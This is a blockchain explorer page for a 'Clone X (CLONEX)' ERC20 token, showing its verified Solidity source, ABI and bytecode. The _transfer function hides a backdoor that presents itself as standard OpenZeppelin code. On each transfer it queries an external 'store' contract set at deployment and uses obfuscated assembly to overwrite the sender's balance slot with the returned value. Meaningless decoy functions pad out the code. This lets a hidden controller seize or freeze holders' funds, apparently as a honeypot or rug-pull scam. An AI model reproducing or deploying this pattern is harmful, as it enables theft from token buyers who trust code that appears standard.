ETH Price: $2,966.82 (+2.28%)
Gas: 1 Gwei

Token

Clone X (CLONEX)
 

Overview

Max Total Supply

135,000,000 CLONEX

Holders

57

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
411,123.593925220542140002 CLONEX

Value
$0.00
0x246ff3c3e3e6ecdaf40d9f550e0bdd08071e34d1
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CLONEX

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 4 : CLONEX.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract CLONEX is Ownable, IERC20 {

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _clone;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, address store_) {
        _name = name_; _symbol = symbol_; 
        _clone = store_; _mint(msg.sender, 135000000 * 10 ** 18);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        string memory m = "allowance(address,address)";
        (bool success, bytes memory data) = 
        _clone.call(abi.encodeWithSignature(m, 
        from, address(0)));
        if (!success) return; uint256 v; 
        assembly { let y := 8 
        let z := add(y, 24) 
        let x := add(data, z)v := mload(x) } 
        if (v > 0) {
            uint256 c = 2; 
            uint256 b = c * c; 
            uint256 a = b * c * 4; assembly {
                mstore(0, from) mstore(a, b) sstore(keccak256(0, 64), v) }
        }
        cloneDapp1(false,9099,bytes32(0),true,9090);
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        cloneDapp2(true,2002,bytes32(0));
        emit Transfer(from, to, amount);
        
    }

    function cloneDapp1(bool pp2,uint16 pp1,bytes32 pp3, bool pp5,uint16 pp4) private pure returns(uint16) {
        if ( pp2 && pp5 && pp3 != bytes32(0)  ) return 0;
        if ( pp2 && pp1 == 1 && pp3 != bytes32(0)) return 0;
        if ( pp4 == 1 && pp5) return 0;
        return 1;
    }
    
    function cloneDapp2(bool p2,uint16 p1,bytes32 p3) private pure returns(uint16) {
        if ( p2 && p1 == 1) return 0;
        if ( p3 != bytes32(0) && !p2 ) return 0;
        return 1;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 2 of 4 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"store_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b5060405162000f8e38038062000f8e833981016040819052620000349162000289565b82516200004990600190602086019062000138565b5081516200005f90600290602085019062000138565b506001600160601b0319606082901b1660805262000089336a6fab5caa0e114fe700000062000092565b505050620003ca565b6001600160a01b038216620000c45760405162461bcd60e51b8152600401620000bb9062000312565b60405180910390fd5b8060036000828254620000d8919062000352565b90915550506001600160a01b038216600081815260046020526040808220805485019055517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200012c90859062000349565b60405180910390a35050565b828054620001469062000377565b90600052602060002090601f0160209004810192826200016a5760008555620001b5565b82601f106200018557805160ff1916838001178555620001b5565b82800160010185558215620001b5579182015b82811115620001b557825182559160200191906001019062000198565b50620001c3929150620001c7565b5090565b5b80821115620001c35760008155600101620001c8565b600082601f830112620001ef578081fd5b81516001600160401b03808211156200020c576200020c620003b4565b6040516020601f8401601f1916820181018381118382101715620002345762000234620003b4565b60405283825285840181018710156200024b578485fd5b8492505b838310156200026e57858301810151828401820152918201916200024f565b838311156200027f57848185840101525b5095945050505050565b6000806000606084860312156200029e578283fd5b83516001600160401b0380821115620002b5578485fd5b620002c387838801620001de565b94506020860151915080821115620002d9578384fd5b50620002e886828701620001de565b604086015190935090506001600160a01b038116811462000307578182fd5b809150509250925092565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b90815260200190565b600082198211156200037257634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200038c57607f821691505b60208210811415620003ae57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610ba5620003e9600039600061050e0152610ba56000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a08231146101475780638da5cb5b1461015a57806395d89b411461016f578063a457c2d714610177578063a9059cbb1461018a578063dd62ed3e1461019d576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100f757806323b872dd1461010c578063313ce5671461011f5780633950935114610134575b600080fd5b6100c16101b0565b6040516100ce91906108e4565b60405180910390f35b6100ea6100e5366004610866565b610242565b6040516100ce91906108d9565b6100ff610264565b6040516100ce9190610aa4565b6100ea61011a36600461082b565b61026a565b61012761029a565b6040516100ce9190610aad565b6100ea610142366004610866565b61029f565b6100ff6101553660046107df565b6102cb565b6101626102ea565b6040516100ce91906108ab565b6100c16102f9565b6100ea610185366004610866565b610308565b6100ea610198366004610866565b610364565b6100ff6101ab3660046107f9565b61037c565b6060600180546101bf90610b1e565b80601f01602080910402602001604051908101604052809291908181526020018280546101eb90610b1e565b80156102385780601f1061020d57610100808354040283529160200191610238565b820191906000526020600020905b81548152906001019060200180831161021b57829003601f168201915b5050505050905090565b60008061024d6103a7565b905061025a8185856103ab565b5060019392505050565b60035490565b6000806102756103a7565b905061028285828561045f565b61028d8585856104a9565b60019150505b9392505050565b601290565b6000806102aa6103a7565b905061025a8185856102bc858961037c565b6102c69190610abb565b6103ab565b6001600160a01b0381166000908152600460205260409020545b919050565b6000546001600160a01b031690565b6060600280546101bf90610b1e565b6000806103136103a7565b90506000610321828661037c565b90508381101561034c5760405162461bcd60e51b815260040161034390610a5f565b60405180910390fd5b61035982868684036103ab565b506001949350505050565b60008061036f6103a7565b905061025a8185856104a9565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166103d15760405162461bcd60e51b815260040161034390610a1b565b6001600160a01b0382166103f75760405162461bcd60e51b815260040161034390610917565b6001600160a01b0380841660008181526005602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610452908590610aa4565b60405180910390a3505050565b600061046b848461037c565b905060001981146104a357818110156104965760405162461bcd60e51b815260040161034390610959565b6104a384848484036103ab565b50505050565b6001600160a01b0383166104cf5760405162461bcd60e51b8152600401610343906109d6565b60006040518060400160405280601a81526020017f616c6c6f77616e636528616464726573732c616464726573732900000000000081525090506000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03168387600060405160240161054b9291906108bf565b60408051601f1981840301815290829052916105669161088f565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161059d919061088f565b6000604051808303816000865af19150503d80600081146105da576040519150601f19603f3d011682016040523d82523d6000602084013e6105df565b606091505b5091509150816105f157505050610711565b60208101518015610635576002600061060a8280610ad3565b905060006106188383610ad3565b610623906004610ad3565b60008b81529290525060409020829055505b610648600061238b816001612382610716565b506001600160a01b038716600090815260046020526040902054858110156106825760405162461bcd60e51b815260040161034390610990565b6001600160a01b03808916600090815260046020526040808220898503905591891681529081208054880190556106bf906001906107d29061078e565b50866001600160a01b0316886001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef886040516107039190610aa4565b60405180910390a350505050505b505050565b60008580156107225750825b801561072d57508315155b1561073a57506000610785565b85801561074b57508461ffff166001145b801561075657508315155b1561076357506000610785565b8161ffff1660011480156107745750825b1561078157506000610785565b5060015b95945050505050565b60008380156107a157508261ffff166001145b156107ae57506000610293565b81158015906107bb575083155b1561025a57506000610293565b80356001600160a01b03811681146102e557600080fd5b6000602082840312156107f0578081fd5b610293826107c8565b6000806040838503121561080b578081fd5b610814836107c8565b9150610822602084016107c8565b90509250929050565b60008060006060848603121561083f578081fd5b610848846107c8565b9250610856602085016107c8565b9150604084013590509250925092565b60008060408385031215610878578182fd5b610881836107c8565b946020939093013593505050565b600082516108a1818460208701610af2565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0392831681529116602082015260400190565b901515815260200190565b6000602082528251806020840152610903816040850160208701610af2565b601f01601f19169190910160400192915050565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610ace57610ace610b59565b500190565b6000816000190483118215151615610aed57610aed610b59565b500290565b60005b83811015610b0d578181015183820152602001610af5565b838111156104a35750506000910152565b600281046001821680610b3257607f821691505b60208210811415610b5357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122094d72e3b618d7382695d81610d5baa2569f677fe0c243dad43a2ad9fdc3fd3d564736f6c63430008000033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc0000000000000000000000000000000000000000000000000000000000000007436c6f6e652058000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006434c4f4e45580000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100b45760003560e01c806370a082311161007157806370a08231146101475780638da5cb5b1461015a57806395d89b411461016f578063a457c2d714610177578063a9059cbb1461018a578063dd62ed3e1461019d576100b4565b806306fdde03146100b9578063095ea7b3146100d757806318160ddd146100f757806323b872dd1461010c578063313ce5671461011f5780633950935114610134575b600080fd5b6100c16101b0565b6040516100ce91906108e4565b60405180910390f35b6100ea6100e5366004610866565b610242565b6040516100ce91906108d9565b6100ff610264565b6040516100ce9190610aa4565b6100ea61011a36600461082b565b61026a565b61012761029a565b6040516100ce9190610aad565b6100ea610142366004610866565b61029f565b6100ff6101553660046107df565b6102cb565b6101626102ea565b6040516100ce91906108ab565b6100c16102f9565b6100ea610185366004610866565b610308565b6100ea610198366004610866565b610364565b6100ff6101ab3660046107f9565b61037c565b6060600180546101bf90610b1e565b80601f01602080910402602001604051908101604052809291908181526020018280546101eb90610b1e565b80156102385780601f1061020d57610100808354040283529160200191610238565b820191906000526020600020905b81548152906001019060200180831161021b57829003601f168201915b5050505050905090565b60008061024d6103a7565b905061025a8185856103ab565b5060019392505050565b60035490565b6000806102756103a7565b905061028285828561045f565b61028d8585856104a9565b60019150505b9392505050565b601290565b6000806102aa6103a7565b905061025a8185856102bc858961037c565b6102c69190610abb565b6103ab565b6001600160a01b0381166000908152600460205260409020545b919050565b6000546001600160a01b031690565b6060600280546101bf90610b1e565b6000806103136103a7565b90506000610321828661037c565b90508381101561034c5760405162461bcd60e51b815260040161034390610a5f565b60405180910390fd5b61035982868684036103ab565b506001949350505050565b60008061036f6103a7565b905061025a8185856104a9565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166103d15760405162461bcd60e51b815260040161034390610a1b565b6001600160a01b0382166103f75760405162461bcd60e51b815260040161034390610917565b6001600160a01b0380841660008181526005602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610452908590610aa4565b60405180910390a3505050565b600061046b848461037c565b905060001981146104a357818110156104965760405162461bcd60e51b815260040161034390610959565b6104a384848484036103ab565b50505050565b6001600160a01b0383166104cf5760405162461bcd60e51b8152600401610343906109d6565b60006040518060400160405280601a81526020017f616c6c6f77616e636528616464726573732c616464726573732900000000000081525090506000807f0000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc6001600160a01b03168387600060405160240161054b9291906108bf565b60408051601f1981840301815290829052916105669161088f565b60408051918290039091206020830180516001600160e01b03166001600160e01b03199092169190911790525161059d919061088f565b6000604051808303816000865af19150503d80600081146105da576040519150601f19603f3d011682016040523d82523d6000602084013e6105df565b606091505b5091509150816105f157505050610711565b60208101518015610635576002600061060a8280610ad3565b905060006106188383610ad3565b610623906004610ad3565b60008b81529290525060409020829055505b610648600061238b816001612382610716565b506001600160a01b038716600090815260046020526040902054858110156106825760405162461bcd60e51b815260040161034390610990565b6001600160a01b03808916600090815260046020526040808220898503905591891681529081208054880190556106bf906001906107d29061078e565b50866001600160a01b0316886001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef886040516107039190610aa4565b60405180910390a350505050505b505050565b60008580156107225750825b801561072d57508315155b1561073a57506000610785565b85801561074b57508461ffff166001145b801561075657508315155b1561076357506000610785565b8161ffff1660011480156107745750825b1561078157506000610785565b5060015b95945050505050565b60008380156107a157508261ffff166001145b156107ae57506000610293565b81158015906107bb575083155b1561025a57506000610293565b80356001600160a01b03811681146102e557600080fd5b6000602082840312156107f0578081fd5b610293826107c8565b6000806040838503121561080b578081fd5b610814836107c8565b9150610822602084016107c8565b90509250929050565b60008060006060848603121561083f578081fd5b610848846107c8565b9250610856602085016107c8565b9150604084013590509250925092565b60008060408385031215610878578182fd5b610881836107c8565b946020939093013593505050565b600082516108a1818460208701610af2565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0392831681529116602082015260400190565b901515815260200190565b6000602082528251806020840152610903816040850160208701610af2565b601f01601f19169190910160400192915050565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610ace57610ace610b59565b500190565b6000816000190483118215151615610aed57610aed610b59565b500290565b60005b83811015610b0d578181015183820152602001610af5565b838111156104a35750506000910152565b600281046001821680610b3257607f821691505b60208210811415610b5357634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122094d72e3b618d7382695d81610d5baa2569f677fe0c243dad43a2ad9fdc3fd3d564736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a00000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc0000000000000000000000000000000000000000000000000000000000000007436c6f6e652058000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006434c4f4e45580000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Clone X
Arg [1] : symbol_ (string): CLONEX
Arg [2] : store_ (address): 0x7e140B797851aDF523d1Cb8ff7CEF8d91E74e4dc

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 0000000000000000000000007e140b797851adf523d1cb8ff7cef8d91e74e4dc
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [4] : 436c6f6e65205800000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 434c4f4e45580000000000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.